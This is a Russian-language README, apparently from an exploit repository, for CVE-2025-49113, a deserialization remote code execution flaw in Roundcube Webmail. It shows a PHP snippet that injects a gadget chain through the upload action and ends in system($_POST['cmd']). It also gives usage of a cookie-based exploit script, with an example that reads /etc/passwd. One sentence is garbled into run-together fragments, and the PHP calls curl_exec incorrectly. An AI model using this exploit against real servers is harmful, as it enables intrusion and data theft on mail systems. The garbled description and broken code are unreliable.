Эксплойт аутентифицированного удаленного выполнения кода для Roundcube Webmail (CVE-2025-49113) через небезопасную десериализацию. Включает внедрение сеанса, доставку цепочки гаджетов и выполнение команд оболочки.
CVE-2025-49113 — это критическая уязвимость небезопасной десериализации в Roundcube Webmail, которая позволяет аутентифицированное удаленное выполнение кода. Уязвимость возникает из-за некорректной обработки сериализованных PHP-объектов во время операций загрузки файлов.
program/steps/mail/attach.inc_file без надлежащей проверки_formfilename_formsystem() для выполнения команд оболочки// Simplified exploitation flow
$target_url = $base_url . "?_task=mail&_action=upload&_form=injected_session_data";
$post_data = [
'_file' => '{"name":"malicious_object_gadget","path":"..."}',
'file' => curl_file_create('fake.png', 'image/png', 'exploit.png')
];
$response = curl_exec($target_url, $post_data);
// Vulnerable deserialization occurs in attach.inc processing
// Gadget chain triggers command execution: system($_POST['cmd']);
php CVE-2025-49113-exploit_cookies.php <url> <cookies> <command>
| Параметр | Описание | Пример |
|---|---|---|
<url> | Базовый URL установки Roundcube | https://mail.example.com/roundcube/ |
<cookies> | Действительные cookie сессии | roundcube_sessid=abc123; roundcube_sessauth=xyz456 |
<command> | Команда ОС для выполнения | id или whoami |
php CVE-2025-49113-exploit_cookies.php \
https://mail.example.com/roundcube/ \
"roundcube_sessid=abc123; roundcube_sessauth=xyz456" \
"cat /etc/passwd"
Эта информация предоставлена исключительно в образовательных целях. Несанкционированное тестирование систем без явного разрешения незаконно. Всегда получайте надлежащее разрешение перед проведением оценки безопасности. Авторы и издатели не несут ответственности за любое неправомерное использование этой информации.